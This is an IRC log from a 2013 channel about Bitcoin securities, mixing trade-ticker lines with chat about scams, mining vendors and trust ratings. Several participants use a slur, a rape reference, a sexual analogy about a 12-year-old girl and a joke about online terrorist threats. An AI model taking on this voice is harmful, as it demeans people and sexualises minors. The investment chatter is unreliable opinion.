[AMC-PT] 45 @ 0.002488 = 0.112 BTC [-] Jun 28 05:22:18 [BTCTC] [AMC-PT] 120 @ 0.002489 = 0.2987 BTC [+] Jun 28 05:22:20 [BTCTC] [AMC-PT] 70 @ 0.002489 = 0.1742 BTC [+] Jun 28 05:24:21 [BTCTC] [AMC-PT] 50 @ 0.00249 = 0.1245 BTC [+] Jun 28 05:25:04 [BTCTC] [RSM] 1 @ 0.021999 BTC [+] Jun 28 05:26:52 [BTCTC] [AMC-PT] 32 @ 0.00249 = 0.0797 BTC [+] Jun 28 05:27:00 [BTCTC] [AMC-PT] 18 @ 0.00249 = 0.0448 BTC [+] Jun 28 05:30:20 [BTCTC] [AMC-PT] 10 @ 0.00249 = 0.0249 BTC [+] Jun 28 05:30:51 [BTCTC] [AMC-PT] 9 @ 0.00249 = 0.0224 BTC [+] Jun 28 05:32:13 [BTCTC] [TAT.ASICMINER] 4 @ 0.033742 = 0.135 BTC [-] Jun 28 05:32:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.033742 = 0.2025 BTC [-] Jun 28 05:32:22 [BTCTC] [TAT.ASICMINER] 30 @ 0.0335 = 1.005 BTC [-] Jun 28 05:36:37 [BTCTC] [DMS.SELLING] 1 @ 0.032 BTC [-] Jun 28 05:36:38 [BTCTC] [DMS.SELLING] 9 @ 0.032 = 0.288 BTC [-] Jun 28 05:38:10 [BTCTC] [DMS.SELLING] 1 @ 0.0311 BTC [-] Jun 28 05:38:12 [BTCTC] [DMS.SELLING] 20 @ 0.0311 = 0.622 BTC [-] Jun 28 05:38:13 [BTCTC] [DMS.SELLING] 4 @ 0.0311 = 0.1244 BTC [-] Jun 28 05:39:32 [BTCTC] [BASIC-MINING] 1 @ 1.860069 BTC [-] Jun 28 05:40:13 [MPEX] [S.MPOE] 12377 @ 0.00083673 = 10.3562 BTC [+] Jun 28 05:40:52 [BTCTC] [ASICMINER-PT] 1 @ 3.390001 BTC [+] Jun 28 05:43:10 [BTCTC] [ASICMINER-PT] 1 @ 3.390001 BTC [+] Jun 28 05:45:03 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.004954 = 0.0892 BTC [+] Jun 28 05:45:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004954 BTC [+] Jun 28 05:46:14 [BTCTC] [AMC-PT] 300 @ 0.00249 = 0.747 BTC [+] Jun 28 05:46:48 [BTCTC] [AMC-PT] 2 @ 0.00249 = 0.005 BTC [+] Jun 28 05:50:13 [HAVELOCK] [ASICM] 5 @ 0.03175 = 0.1588 BTC [+] Jun 28 05:50:35 [BTCTC] [BITVPS] 2 @ 0.001153 = 0.0023 BTC [+] Jun 28 05:51:51 [BTCTC] [TAT.ASICMINER] 38 @ 0.033881 = 1.2875 BTC [+] Jun 28 05:56:52 [BTCTC] [S.MPOE-PT] 5 @ 0.00089 = 0.0045 BTC [+] Jun 28 05:56:54 [BTCTC] [S.MPOE-PT] 1 @ 0.00089 BTC [+] Jun 28 05:56:55 [BTCTC] [S.MPOE-PT] 1 @ 0.00089 BTC [+] Jun 28 05:57:51 [BTCTC] [AMC-PT] 10 @ 0.00249 = 0.0249 BTC [+] Jun 28 05:58:30 [BTCTC] [AMC-PT] 1100 @ 0.00249 = 2.739 BTC [+] Jun 28 05:59:18 [BTCTC] [ASICMINER-PT] 6 @ 3.39 = 20.34 BTC [-] Jun 28 06:00:24 [BTCTC] [ASICMINER-PT] 18 @ 3.39 = 61.02 BTC [-] Jun 28 06:00:31 [MPEX] [S.MPOE] 1000 @ 0.00083673 = 0.8367 BTC [+] Jun 28 06:01:03 [BTCTC] [AMC-PT] 400 @ 0.00249 = 0.996 BTC [+] Jun 28 06:08:13 [BTCTC] [AMC-PT] 400 @ 0.00249 = 0.996 BTC [+] Jun 28 06:10:01 [BTCTC] [AMC-PT] 30 @ 0.00249 = 0.0747 BTC [+] Jun 28 06:12:44 [HAVELOCK] [ASICM] 31 @ 0.03295 = 1.0215 BTC [+] Jun 28 06:14:11 [HAVELOCK] [ASICM] 215 @ 0.032949 = 7.084 BTC [-] Jun 28 06:14:38 [BTCTC] [AMC-PT] 100 @ 0.00249 = 0.249 BTC [+] Jun 28 06:14:56 [BTCTC] [AMC-PT] 50 @ 0.00249 = 0.1245 BTC [+] Jun 28 06:14:59 [HAVELOCK] [ASICM] 1030 @ 0.03295 = 33.9385 BTC [+] Jun 28 06:15:58 [BTCTC] [DMS.MINING] 4 @ 0.021 = 0.084 BTC [+] Jun 28 06:16:06 http://www.bbc.co.uk/news/business-23093548 Jun 28 06:16:10 BBC News - Gold price falls below $1,200 an ounce Jun 28 06:16:39 [BTCTC] [DMS.MINING] 1 @ 0.0213 BTC [+] Jun 28 06:16:53 [BTCTC] [DMS.MINING] 10 @ 0.021659 = 0.2166 BTC [+] Jun 28 06:17:09 [BTCTC] [DMS.MINING] 21 @ 0.02166 = 0.4549 BTC [+] Jun 28 06:17:39 [BTCTC] [DMS.MINING] 10 @ 0.0219 = 0.219 BTC [+] Jun 28 06:18:15 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [-] Jun 28 06:21:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.033852 BTC [-] Jun 28 06:21:15 [BTCTC] [ASICMINER-PT] 8 @ 3.38 = 27.04 BTC [-] Jun 28 06:21:23 [BTCTC] [ASICMINER-PT] 5 @ 3.38 = 16.9 BTC [-] Jun 28 06:24:27 What exactly is bitcoin assets? Jun 28 06:26:20 you're in it Jun 28 06:26:43 I mean, Is this a service? Jun 28 06:27:17 it's an irc channel Jun 28 06:27:25 for discussion of bitcoin securities Jun 28 06:27:37 stocks, bonds, etc. Jun 28 06:27:44 also bullshit Jun 28 06:27:52 yeah there is a lot of bs here Jun 28 06:28:00 What are we considering to be BTC Securityies? Jun 28 06:28:08 You can say that again. Jun 28 06:28:13 [BTCTC] [ASICMINER-PT] 5 @ 3.38 = 16.9 BTC [-] Jun 28 06:28:18 WhuWhu, btct.co Jun 28 06:28:31 WhuWhu: check out hte /topic Jun 28 06:28:44 Oh! I had a friend triple his money in 1 gat with asicminer-pt Jun 28 06:28:54 gat=day Jun 28 06:29:34 http://tvtropes.org/pmwiki/pmwiki.php/Main/SerialNumbersFiledOff Jun 28 06:29:36 Serial Numbers Filed Off - Television Tropes & Idioms Jun 28 06:29:41 tvtropes has a page dedicated to bfl Jun 28 06:31:14 [BTCTC] [TAT.ASICMINER] 43 @ 0.033406 = 1.4365 BTC [-] Jun 28 06:32:42 [BTCTC] [ASICMINER-PT] 2 @ 3.38 = 6.76 BTC [-] Jun 28 06:34:50 dub: I can't find hte /topic Jun 28 06:35:05 [BTCTC] [DMS.MINING] 10 @ 0.021899 = 0.219 BTC [-] Jun 28 06:35:54 [BTCTC] [ASICMINER-PT] 1 @ 3.38 BTC [-] Jun 28 06:37:03 what happens if you enter /topic on a new line and hit enter Jun 28 06:37:35 heh thx Jun 28 06:37:37 hte /topic Jun 28 06:37:59 all signs point to time for me to go to bed Jun 28 06:38:07 have fun bro bros Jun 28 06:38:09 [BTCTC] [AMC-PT] 7750 @ 0.002485 = 19.2588 BTC [-] Jun 28 06:38:24 [BTCTC] [COGNITIVE] 1 @ 0.533 BTC [-] Jun 28 06:38:30 WhuWhu: type /topic Jun 28 06:38:53 I got an error said insufficient arguments Jun 28 06:39:01 --- Topic for #bitcoin-assets: http://bitcoin-assets.com || http://log.bitcoin-assets.com - Jun 28 06:39:04 most days worth reading, I heard. Jun 28 06:39:10 [BTCTC] [COGNITIVE] 1 @ 0.535 BTC [+] Jun 28 06:39:12 [BTCTC] [COGNITIVE] 5 @ 0.535 = 2.675 BTC [+] Jun 28 06:40:01 [BTCTC] [COGNITIVE] 7 @ 0.545 = 3.815 BTC [+] Jun 28 06:41:25 [BTCTC] [COGNITIVE] 8 @ 0.55 = 4.4 BTC [+] Jun 28 06:41:39 cognitive still worth something? Jun 28 06:42:26 [BTCTC] [AMC-PT] 12 @ 0.00248 = 0.0298 BTC [-] Jun 28 06:42:32 [BTCTC] [COGNITIVE] 8 @ 0.565 = 4.52 BTC [+] Jun 28 06:43:23 [HAVELOCK] [ASICM] 205 @ 0.03296 = 6.7568 BTC [+] Jun 28 06:44:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.033783 BTC [+] Jun 28 06:45:58 [HAVELOCK] [ASICM] 1 @ 0.03296 BTC [+] Jun 28 06:48:25 Cognitive's site looks lik someone pooped it out in the 1970's and saved it for release today to be retro Jun 28 06:48:50 [BTCTC] [BITVPS] 2 @ 0.000951 = 0.0019 BTC [-] Jun 28 06:48:51 but css! Jun 28 06:49:38 don't hate, he's 17 and busy scamming people Jun 28 06:50:02 dub, Cognitive? Jun 28 06:50:10 yes Jun 28 06:50:28 Zhtoutonged Jun 28 06:50:36 or however you spell it Jun 28 06:51:12 I guess today is adopt a goon circlejerk day or something Jun 28 06:51:16 [BTCTC] [AMC-PT] 4 @ 0.00248 = 0.0099 BTC [-] Jun 28 06:51:31 lol Jun 28 06:51:32 du8b: why is that? Jun 28 06:51:39 i;m off, take it easy. **** BEGIN LOGGING AT Fri Jun 28 15:39:35 2013 Jun 28 15:42:26 [BTCTC] [BASIC-MINING] 3 @ 0.189973 = 0.5699 BTC [-] Jun 28 15:43:51 [MPEX] [S.MPOE] 2866 @ 0.00082436 = 2.3626 BTC [+] Jun 28 15:46:41 hi mjr_ it's okay Jun 28 15:46:51 [BTCTC] [DMS.MINING] 8 @ 0.023326 = 0.1866 BTC [+] Jun 28 15:47:08 i'm in germany atm Jun 28 15:48:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.032951 = 0.0989 BTC [-] Jun 28 15:49:29 can we make Vbs the official cheerleader for AMC? Jun 28 15:49:34 having a good time (although the weather kinda sucks) Jun 28 15:49:48 .bait Jun 28 15:49:52 http://24.media.tumblr.com/tumblr_m3qokvJBHj1qbl0vwo1_1280.jpg Jun 28 15:50:49 cu later Jun 28 15:51:50 [BTCTC] [BASIC-MINING] 6 @ 0.189963 = 1.1398 BTC [-] Jun 28 15:51:52 [BTCTC] [BASIC-MINING] 1 @ 0.189964 BTC [+] Jun 28 15:51:57 chsados: Indeed, I should talk less about it tbh Jun 28 15:52:23 It is rather amusing on the thread Vbs, keep it up :D Jun 28 15:53:21 chsados: dunno, pretty tiresome :/ Jun 28 15:53:22 cheerleading and sharing info and speculating are not all the same Jun 28 15:53:39 cheerleading is bad Jun 28 15:53:43 speculating can be bad Jun 28 15:53:49 sharing info is good Jun 28 15:54:09 and ovaltine is good for the bones! Jun 28 15:54:19 so is breast milk Jun 28 15:54:23 ThickAsThieves: I hope you view me in the "sharing info" light, that's my aim Jun 28 15:54:40 i think sharing info is your intent Jun 28 15:54:52 but your excitement does lead to a little cheerleading Jun 28 15:55:13 which, as we discussed, can be bad for you Jun 28 15:55:15 mostly Jun 28 15:55:27 ThickAsThieves: I know, trying to be as stoic as possible atm :P Jun 28 15:55:30 hehe Jun 28 15:55:48 #b-a breaking you, one day at a time Jun 28 15:55:56 the forum never ceases to deliver. Jun 28 15:55:59 hehe Jun 28 15:56:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.033891 = 0.1695 BTC [+] Jun 28 15:56:15 people in the "you;'d be better ioff gambling" thread are liek... Jun 28 15:56:29 "here, let me regurgitate what i've captured throuygh socialisation" Jun 28 15:56:58 this idea of making schooling an offshot of socialisation was indeed very fucking stupid. Jun 28 15:56:58 mircea_popescu, are you the one who payed those hotties a bunch of BTC on /r/girlsgonebitcoin Jun 28 15:57:13 probably not. Jun 28 15:57:38 [BTCTC] [BASIC-MINING] 2 @ 0.189998 = 0.38 BTC [+] Jun 28 15:57:52 there's a growing breed of people-who-think-they-are-deprived-and-or-mpoe-pr on the forums lately Jun 28 15:58:05 they get so proud of themselves that thy figured something out Jun 28 15:58:06 mircea_popescu: was thinking you'd answer provably not Jun 28 15:58:13 so they need to repeat it every hour in new ways Jun 28 15:58:14 [MPEX] [S.MPOE] 6978 @ 0.00082436 = 5.7524 BTC [+] Jun 28 15:58:15 [MPEX] [S.MPOE] 11500 @ 0.00082462 = 9.4831 BTC [+] Jun 28 15:58:28 [MPEX] [S.MPOE] 1900 @ 0.00082606 = 1.5695 BTC [+] Jun 28 15:59:06 yes, gets tiresome Jun 28 16:00:16 [MPEX] [S.MPOE] 4017 @ 0.00083009 = 3.3345 BTC [+] Jun 28 16:02:22 ThickAsThieves dude your thread rocks nao. Jun 28 16:02:40 lol @deprivedmpoe Jun 28 16:02:59 actually, mpoe-pr made a post saying that "now all the scammers will tyry to be me" Jun 28 16:03:03 about i dunno, 3 months ago ? 6 ? Jun 28 16:03:20 (not implying deprived is a scammer by any means) Jun 28 16:03:34 lol Vbs Jun 28 16:04:22 does anyone know any slick website that helps with making business proposals? Jun 28 16:07:27 bitcointalk ? Jun 28 16:07:55 lol Jun 28 16:07:56 hahaha Jun 28 16:08:00 chsados, they all suck Jun 28 16:08:12 i researched many a year ago or so Jun 28 16:08:22 some have cool features Jun 28 16:08:29 but none have all necessary feature Jun 28 16:08:30 s Jun 28 16:08:43 what happens is once any of the services achieves any success Jun 28 16:08:45 thet milk it Jun 28 16:08:46 ive got all the stats, info needed i just need to learn how to properly organize it to show to a bank for a small business loan Jun 28 16:08:50 and stop dev Jun 28 16:08:51 "PIZZA ACCOUNT HACKED BEWARE SCAM" Jun 28 16:08:53 win. Jun 28 16:08:55 are electronic payment processors catching on? https://www.simplify.com/commerce/ Jun 28 16:09:28 nope, nevermind, fees still 2.85%+$.30 per TXN Jun 28 16:09:46 deadweasel there have been about as many of these shitty "we webpayments" made-to-start-up craps Jun 28 16:09:52 as there have been mining corps. Jun 28 16:13:01 https://bitcointalk.org/index.php?topic=244724.msg2603331#msg2603331 Jun 28 16:13:07 How to Become a Bitcoin Investor in 8 Easy Steps (comic relief) Jun 28 16:13:41 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.005122 = 0.1537 BTC [-] Jun 28 16:13:43 [BTCTC] [TAT.VIRTUALMINE] 120 @ 0.005121 = 0.6145 BTC [-] **** BEGIN LOGGING AT Fri Jun 28 16:18:27 2013 Jun 28 16:19:03 [BTCTC] [BASIC-MINING] 1 @ 0.189998 BTC [+] Jun 28 16:23:27 [BTCTC] [BITVPS] 10 @ 0.001013 = 0.0101 BTC [-] Jun 28 16:24:31 ah, that was relieving. thx mp. Jun 28 16:25:00 i had a flicker here. did i miss anything ? Jun 28 16:26:04 https://bitcointalk.org/index.php?topic=242962.msg2603253#msg2603253 Jun 28 16:26:07 she's on a roll this morning. Jun 28 16:26:13 nope Jun 28 16:26:23 getting my coffee in me Jun 28 16:26:46 Just-Dice.com : Invest in 1% House Edge Dice Game Jun 28 16:28:11 https://bitcointalk.org/index.php?topic=244316.msg2603292#msg2603292 Jun 28 16:28:13 bwaghaha Jun 28 16:28:20 ok, three in one sitting she gets a bonus. Jun 28 16:28:33 Choice words of wisdom for the forum investors from our esteemed leader. Jun 28 16:29:26 [BTCTC] [BASIC-MINING] 6 @ 0.189998 = 1.14 BTC [+] Jun 28 16:30:12 http://pastebin.com/eA63XGBD Jun 28 16:30:15 so people want just-dice to turn the investment side into gambling too? Jun 28 16:30:15 I, ozbot, am a faggot please rape my face - Pastebin.com Jun 28 16:30:31 [MPEX] [S.MPOE] 3200 @ 0.00083044 = 2.6574 BTC [+] Jun 28 16:30:37 lol Jun 28 16:30:39 lol Scrat Jun 28 16:31:04 not exactly ThickAsThieves Jun 28 16:31:48 i saw the request for varying levels of risk Jun 28 16:32:23 that's my request. Jun 28 16:32:32 groggy this morning Jun 28 16:32:52 that was what i originally thought Jun 28 16:33:02 haven't followed the thread much Jun 28 16:34:13 then people realised that wait, this arbitrary barrier to entry once removed will let the site soar Jun 28 16:34:18 which means it'll soar out of our 5 btc corral Jun 28 16:34:26 which means OMG NO!!! WE DONT MATTER?!?!?! Jun 28 16:34:33 but we were here first!!11 two days late!!11 Jun 28 16:35:11 [BTCTC] [BITVPS] 7 @ 0.001013 = 0.0071 BTC [-] Jun 28 16:35:25 is betting keeping up with investing nicely still? Jun 28 16:35:46 [BTCTC] [AMC-PT] 6 @ 0.002499 = 0.015 BTC [+] Jun 28 16:36:15 [MPEX] [S.MPOE] 5800 @ 0.00083044 = 4.8166 BTC [+] Jun 28 16:36:24 it's ahead. Jun 28 16:37:28 A Vatican official was arrested Friday by Italian police for allegedly trying to bring 20 million euros ($26 million) in cash into the country from Switzerland aboard an Italian government plane, Jun 28 16:38:27 nice Jun 28 16:38:47 shoulda used bitcoin, when will they learn Jun 28 16:39:10 myea. old farts. Jun 28 16:39:26 [HAVELOCK] [ASICM] 37 @ 0.032958 = 1.2194 BTC [+] Jun 28 16:39:56 lol "vatacan endorses bitcoin!, pope: "praise the lord, bitcoin has arrived!" Jun 28 16:40:15 [BTCTC] [BTC-BOND] 10 @ 0.009999 = 0.1 BTC [+] Jun 28 16:41:41 http://thegenesisblock.com/amc-announces-4-8-ths-bitcoin-miners-for-3000-btc/ Jun 28 16:41:52 AMC Announces 4.8 TH/s Bitcoin Miners for 3,000 BTC - The Genesis Block Jun 28 16:42:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.033887 = 0.1017 BTC [-] Jun 28 16:42:48 right. Jun 28 16:42:58 [HAVELOCK] [ASICM] 1 @ 0.032958 BTC [+] Jun 28 16:43:07 well at least crowding out the vaporware space will finally choke bfl out of this world Jun 28 16:43:23 [BTCTC] [AMC-PT] 7000 @ 0.002499 = 17.493 BTC [+] Jun 28 16:43:25 not in the sense that they'll ever stfu obviously. Jun 28 16:43:39 [HAVELOCK] [ASICM] 2 @ 0.032958 = 0.0659 BTC [+] Jun 28 16:43:46 "AMC will be partnering with eASIC, an established manufacturer. A review of their past manufacturing experience only indicates expertise in 90nm and 45nm chips, raising some question as to how reliable their estimates will be" Jun 28 16:44:46 wait what ? Jun 28 16:44:52 how is easic established ? Jun 28 16:45:33 [BTCTC] [DMS.MINING] 93 @ 0.023 = 2.139 BTC [-] Jun 28 16:45:37 because everyone reporting says so Jun 28 16:45:49 they worked with Seagate or whatever Jun 28 16:46:06 if every hairdresser that worked with madonna could sing... Jun 28 16:46:29 she'd have much easier a time hiring backing vocals. Jun 28 16:47:06 okay so these units will cost 3,000 btc and AMC intends to sell 100 of them, in addition to 800 lesser units, in addition to selling bulk chips Jun 28 16:47:31 [BTCTC] [AMC-PT] 592 @ 0.002499 = 1.4794 BTC [+] Jun 28 16:47:58 yes, because out of a blockchain that dribbles 150 btc an hour there's plenty of space to make 500k+ capital expenditures Jun 28 16:48:06 so guessing he expects 500,000btc in sales this winter? Jun 28 16:48:32 so far we've got asicminer valued at 1.2mn + 500k here and this is maybe half the story. Jun 28 16:48:43 the blockchain is supposed to produce like i dunno, 5mn btcs. Jun 28 16:49:03 mathematically that's 33k hours, or about 3 years. Jun 28 16:49:33 [BTCTC] [AMC-PT] 4 @ 0.002499 = 0.01 BTC [+] Jun 28 16:49:58 http://sourcefednews.com/teen-arrested-over-sarcastic-comment/ Jun 28 16:50:14 we could also play with the difficulty numbers all these glorious units will impose Jun 28 16:50:26 but i'm not THAT bored Jun 28 16:50:32 we could, yes. but whikle btc changing hands is likely, Jun 28 16:50:49 the difficulty these glorious units will impose is... you know, like luke. Jun 28 16:51:28 heavenly? Jun 28 16:51:31 [BTCTC] [ASICMINER-PT] 1 @ 3.380002 BTC [-] Jun 28 16:51:33 [BTCTC] [ASICMINER-PT] 1 @ 3.38 BTC [-] Jun 28 16:51:35 [BTCTC] [ASICMINER-PT] 1 @ 3.378 BTC [-] Jun 28 16:51:35 “Someone had said something to the effect of ‘Oh you’re insane, you’re crazy, you’re messed up in the head,’ to which he replied ‘Oh yeah, I’m real messed up in the head, I’m going to go shoot up a school full of kids and eat their still, beating hearts,’” recalled Justin’s dad Jack. “The next two lines were lol and jk.” Jun 28 16:51:37 [BTCTC] [ASICMINER-PT] 3 @ 3.376309 = 10.1289 BTC [-] Jun 28 16:51:39 [BTCTC] [ASICMINER-PT] 1 @ 3.3763 BTC [-] Jun 28 16:51:40 [BTCTC] [ASICMINER-PT] 1 @ 3.3761 BTC [-] Jun 28 16:51:42 [BTCTC] [ASICMINER-PT] 1 @ 3.376 BTC [-] Jun 28 16:51:43 [BTCTC] [ASICMINER-PT] 1 @ 3.376 BTC [-] Jun 28 16:51:45 [BTCTC] [ASICMINER-PT] 1 @ 3.37501 BTC [-] Jun 28 16:51:46 [BTCTC] [ASICMINER-PT] 4 @ 3.375 = 13.5 BTC [-] Jun 28 16:51:48 [BTCTC] [ASICMINER-PT] 2 @ 3.375 = 6.75 BTC [-] Jun 28 16:51:49 [BTCTC] [ASICMINER-PT] 1 @ 3.3701 BTC [-] Jun 28 16:52:37 source website seems shady Jun 28 16:52:48 but not totally unbelievable i guess Jun 28 16:53:11 we need to make more terrorist threats online. Jun 28 16:53:34 oh it comes from a Texas news sitr Jun 28 16:53:40 go for it Jun 28 16:53:53 [BTCTC] [AMC-PT] 22398 @ 0.002499 = 55.9726 BTC [+] Jun 28 16:53:55 [BTCTC] [AMC-PT] 100 @ 0.002499 = 0.2499 BTC [+] Jun 28 16:53:56 i'll sit out this one though Jun 28 16:53:56 [BTCTC] [AMC-PT] 2502 @ 0.002499 = 6.2525 BTC [+] Jun 28 16:54:19 probly got like 5 gov agencies watching me already Jun 28 16:54:39 hmm at teh bottom of the AMC website it says "PAYMENT UPON SHIPMENT" Jun 28 16:54:59 sure i'll pre-order one, and decide to pay or not to pay when you ship it Jun 28 16:55:09 heh Jun 28 16:55:10 if its not gonna make a good return, i just wont pay, and you wont ship? Jun 28 16:55:31 i think they left some crud in their ecommerce template Jun 28 16:55:32 i bet he'll accept credit cards too Jun 28 16:55:34 in a rush to get it out the door Jun 28 16:55:35 and paypal Jun 28 16:55:53 CONTACT US Jun 28 16:55:53 My Company Jun 28 16:55:53 42 avenue des Champs Elysées Jun 28 16:55:53 75000 Paris Jun 28 16:55:53 France Jun 28 16:55:53 Tel 0123-456-789 Jun 28 16:55:54 Email sales@yourcompany.com Jun 28 16:55:59 lol Jun 28 16:56:38 maybe everything he says is placeholder text too Jun 28 16:56:39 yea, i think i'll sit this one out too :p Jun 28 16:56:51 scanning for lorem ipsum... Jun 28 16:56:58 i think they left some crud in their ecommerce template << Jun 28 16:57:13 bwahaha jesus. Jun 28 16:57:30 http://timesofindia.indiatimes.com/business/india-business/RBI-red-flags-virtual-currency/articleshow/20808495.cms Jun 28 16:58:22 "he concerns have been voiced at a time when the US authorities have cracked down on a virtual currency company "Liberty Reserve" alleging that it was involved in money laundering." Jun 28 16:58:28 five year old material rehash ftw. Jun 28 17:00:14 [HAVELOCK] [ASICM] 1 @ 0.032958 BTC [+] Jun 28 17:00:16 [BTCTC] [BASIC-MINING] 1 @ 0.188999 BTC [-] Jun 28 17:00:20 [BTCTC] [BASIC-MINING] 46 @ 0.189 = 8.694 BTC [+] Jun 28 17:00:22 [BTCTC] [BASIC-MINING] 16 @ 0.189998 = 3.04 BTC [+] Jun 28 17:00:23 [BTCTC] [BASIC-MINING] 12 @ 0.19763 = 2.3716 BTC [+] Jun 28 17:01:23 "I think TAT, that you're advocating eternal vigilance and complete due diligence on the part of investors and I believe this position is one of fantasy. I don't believe it's reasonable to expect that of anyone unless they make it a full time occupation. This is why organized trust rating services are valuable." Jun 28 17:01:49 i both totally agree and totally disagree with him Jun 28 17:01:53 exactly. Jun 28 17:02:03 explain to him that the year is 3 aB. Jun 28 17:02:12 https://bitcointalk.org/index.php?topic=244462.msg2603525#msg2603525 Jun 28 17:02:15 he can have the amenties of 1950 just as soon as 1947 years pass. Jun 28 17:02:16 The expectation of div's sets the world of crypto-stocks off on the wrong foot Jun 28 17:02:26 what are you guys blabbing about this time Jun 28 17:03:11 oh you know, holding ourselves on pedastals trying not to tip over from the weight of our own heads Jun 28 17:03:14 same old shit Jun 28 17:03:30 [BTCTC] [AMC-PT] 20 @ 0.002499 = 0.05 BTC [+] Jun 28 17:03:41 ssdd huh Jun 28 17:03:48 i saw a forum link so it must be ssdd Jun 28 17:03:52 [BTCTC] [BASIC-MINING] 1 @ 0.19763 BTC [+] Jun 28 17:04:33 so amc is legit or no and do i want to wait it out to see Jun 28 17:04:41 not. Jun 28 17:04:45 too legit to quit Jun 28 17:04:47 probably neither and mining isn't going anywhere after this year Jun 28 17:04:52 anyways Jun 28 17:04:56 that's true but besides the point. Jun 28 17:05:07 and yes all the scams will masquerade as honest businesses hit by the mining collapse, Jun 28 17:05:14 an event "nobody could have foreseen" Jun 28 17:05:23 just like the glbse scammers are playing like they're honest today. Jun 28 17:05:27 [BTCTC] [AMC-PT] 2718 @ 0.002499 = 6.7923 BTC [+] Jun 28 17:05:40 BFL is getting rich though Jun 28 17:05:45 i wish they had shares Jun 28 17:06:04 so that's something. Jun 28 17:06:08 how do you figure already. Jun 28 17:06:35 if theyve been mining with secret units theyd be doing pretty well Jun 28 17:06:49 mircea_popescu usagi wants to give you money he/she wants you to take it off ignores Jun 28 17:07:03 fuck him. Jun 28 17:07:08 i will never do that again Jun 28 17:07:26 relay messages like a slave Jun 28 17:07:26 jcpham: burning sensation? Jun 28 17:07:33 ThickAsThieves if i've been living on secret planets i've been having a lot of fun. Jun 28 17:07:57 no but seriously, people need to grow up to the realisation that much like virginity, your honestly is not repairable. Jun 28 17:07:59 you fuck up once. Jun 28 17:08:03 that is all and that's the end. Jun 28 17:08:32 on the internet. if you are caught lying. sure. Jun 28 17:08:42 'specialy in bitcoin land Jun 28 17:08:50 but everyone has short memories Jun 28 17:08:51 all this "o, i ran with your moneys but pls sign here and you get new shares on a new venue" bs... Jun 28 17:08:56 this is not an acceptable substitute. Jun 28 17:09:09 i have a longer memory than my cock. this is very long indeed. Jun 28 17:10:09 usagi you can send it to me and i'll send it to mircea_popescu when he's ready for it Jun 28 17:10:16 totally trusty escrow right here Jun 28 17:10:25 exxcept you then compromise yourown trust Jun 28 17:10:36 #1 total trust member deluxe Jun 28 17:10:39 lol Jun 28 17:10:58 Trust relationship from user usagi to user jcpham: Level 1: 0, Level 2: 7 via 12 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=usagi&dest=jcpham Jun 28 17:11:04 ThickAsThieves let him have fun, anyone that wants direct involvement with usagi is welcome to the results. Jun 28 17:11:41 16oZLYWhUBzv1hMHH6G5PhZiz2jY5ECDCS Jun 28 17:11:46 you have your own address Jun 28 17:11:53 so anyways Jun 28 17:12:21 oh fuck all that Jun 28 17:12:29 i have to keep track of shares Jun 28 17:12:39 let me get my my abacus Jun 28 17:13:04 this feel legal Jun 28 17:13:10 do i need an attorney present Jun 28 17:15:01 does it compromise trust to give the people what they want, even if you know they should not want it? Jun 28 17:15:11 ie giving them their Trust Agency Jun 28 17:16:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.033879 BTC [-] Jun 28 17:17:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.033101 = 0.1324 BTC [-] Jun 28 17:19:21 [BTCTC] [AMC-PT] 69 @ 0.002498 = 0.1724 BTC [-] Jun 28 17:19:33 [BTCTC] [S.DICE-PT] 10 @ 0.0018 = 0.018 BTC [+] Jun 28 17:20:29 [BTCTC] [AMC-PT] 151 @ 0.002498 = 0.3772 BTC [-] Jun 28 17:20:31 [BTCTC] [AMC-PT] 1980 @ 0.002498 = 4.946 BTC [-] Jun 28 17:20:32 [BTCTC] [AMC-PT] 1126 @ 0.002499 = 2.8139 BTC [+] Jun 28 17:21:46 [BTCTC] [AMC-PT] 10 @ 0.002499 = 0.025 BTC [+] Jun 28 17:22:26 ThickAsThieves that's a thorny issue. Jun 28 17:22:31 [BTCTC] [BASIC-MINING] 1 @ 0.197629 BTC [-] Jun 28 17:22:35 [HAVELOCK] [ASICM] 12 @ 0.032958 = 0.3955 BTC [+] Jun 28 17:23:15 compare and contrast case A, 12 yo chick wanting to suck cock with case B, 12 yo chick wanting to snort coke. Jun 28 17:23:16 like serving PMBs I guess Jun 28 17:24:11 sounds like an untrustworthy lil girl Jun 28 17:24:46 rate her ass. Jun 28 17:25:11 you lost me Jun 28 17:25:17 [BTCTC] [BASIC-MINING] 7 @ 0.197629 = 1.3834 BTC [-] Jun 28 17:25:31 "sounds like an untrustworthy lil girl" "rate her ass" Jun 28 17:25:38 what, that needs to be explained ?! Jun 28 17:25:48 lol Jun 28 17:26:15 hookers and blow get +1 ratings Jun 28 17:26:19 age is unimportant Jun 28 17:26:27 mp you have me using fancy analogies too now Jun 28 17:26:31 your analogies have colors that don't even exist in fucking rainbows, MP. It takes a moment.. Jun 28 17:26:37 [BTCTC] [B.YABMC] 40 @ 0.0064 = 0.256 BTC [-] Jun 28 17:26:38 https://bitcointalk.org/index.php?topic=244462.msg2603771#msg2603771 Jun 28 17:26:43 The expectation of div's sets the world of crypto-stocks off on the wrong foot Jun 28 17:26:45 even after several moments I can only follow about half of htem. Jun 28 17:26:49 " A lack of trustworthy businesses does not command a need for a trust-bestowing agency. If there are not enough hot women in the room, do you hire someone to determine whether a woman is hot or not?" Jun 28 17:26:54 http://www.youtube.com/watch?v=Z6PiePIOKUk << this is about to ipo. Jun 28 17:26:56 One Banana Two Bananas Three Bananas Four Bananas From Vasto - YouTube Jun 28 17:27:42 speaking of which, http://trilema.com/2013/growin-my-own/ Jun 28 17:28:01 where can i get one banana, tweo banana shares Jun 28 17:28:06 which funding platform? Jun 28 17:28:44 [MPEX] [S.MPOE] 8062 @ 0.00083052 = 6.6957 BTC [+] Jun 28 17:28:58 [MPEX] [S.MPOE] 4465 @ 0.00083059 = 3.7086 BTC [+] Jun 28 17:29:00 [MPEX] [S.MPOE] 1873 @ 0.00083065 = 1.5558 BTC [+] Jun 28 17:29:26 bananastocks. Jun 